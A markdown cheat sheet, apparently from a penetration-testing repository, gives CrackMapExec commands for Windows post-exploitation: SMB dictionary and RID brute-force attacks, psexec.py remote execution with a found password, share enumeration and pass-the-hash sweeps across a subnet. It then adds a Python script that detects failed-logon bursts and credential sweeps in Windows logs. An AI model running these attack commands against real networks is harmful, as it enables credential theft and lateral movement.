killchain-compendium/Post Exploitation/Windows/CrackMapExec.md

CrackMapExec

Dictionary attack against SMB

cme <smb/mssql> <domain/IP> -u <user> -p /usr/share/seclists/Passwords/Leaked-Databases/rockyou.txt --continue-on-success --no-brute

Brute Force attack against SMB

RID brute force (account enumeration up to RID 10000) using an anonymous user

cme smb <TARGET_IP> -u anonymous -p "" --rid-brute 10000

Use Found Password

Use the password with impacket/examples/psexec.py in the following way:

psexec.py domain.name/<user>:<password>@<target-IP>

Enumerate Shares

Check user permissions on shares

crackmapexec smb 10.200.x.0/24 -u <user> -p <password> --shares

SMB

Check a user's hash across the network via SMB

crackmapexec smb 10.200.x.0/24 -u <user> -d <domain> -H <hash>
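
Detection

The commands above leave two recognisable patterns in Windows Security logs: a burst of failed logons (event 4625) for one account from one source, and one account authenticating from one source to many hosts within seconds. The following is an added example, not part of the original cheat sheet; the one-line log format, the thresholds, the host names and the addresses are constructed assumptions.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample events (assumed format): time, event ID, host, source IP, account.
# 4625 = failed logon, 4624 = successful logon.
SAMPLE = "\n".join(
    [f"2024-05-01T10:00:0{i} 4625 FS01 10.200.5.77 alice" for i in range(6)]
    + ["2024-05-01T10:00:07 4624 FS01 10.200.5.77 alice"]
    + [f"2024-05-01T10:02:0{i} 4624 WS0{i} 10.200.5.77 bob" for i in range(1, 6)]
    + ["2024-05-01T09:00:00 4625 FS01 10.200.5.20 carol",
       "2024-05-01T09:00:30 4624 FS01 10.200.5.20 carol"]
)

def parse(text):
    """Turn the assumed log lines into time-ordered event tuples."""
    events = []
    for line in text.splitlines():
        ts, eid, host, src, user = line.split()
        events.append((datetime.fromisoformat(ts), int(eid), host, src, user))
    return sorted(events)

def failed_logon_bursts(events, threshold=5, window=timedelta(minutes=1)):
    """(source, account) pairs with >= threshold failed logons inside one window."""
    recent, hits = defaultdict(list), set()
    for ts, eid, host, src, user in events:
        if eid != 4625:
            continue
        times = recent[(src, user)]
        times.append(ts)
        while ts - times[0] > window:   # drop failures older than the window
            times.pop(0)
        if len(times) >= threshold:
            hits.add((src, user))
    return hits

def credential_sweeps(events, threshold=4, window=timedelta(minutes=1)):
    """(source, account) pairs that log on to >= threshold distinct hosts inside one window."""
    recent, hits = defaultdict(list), set()
    for ts, eid, host, src, user in events:
        seen = recent[(src, user)]
        seen.append((ts, host))
        while ts - seen[0][0] > window:  # keep only logons inside the window
            seen.pop(0)
        if len({h for _, h in seen}) >= threshold:
            hits.add((src, user))
    return hits

if __name__ == "__main__":
    events = parse(SAMPLE)
    print("failed-logon bursts:", failed_logon_bursts(events))
    print("credential sweeps:  ", credential_sweeps(events))
```

Thresholds and window sizes need tuning against normal logon volume in the environment before either check is used for alerting.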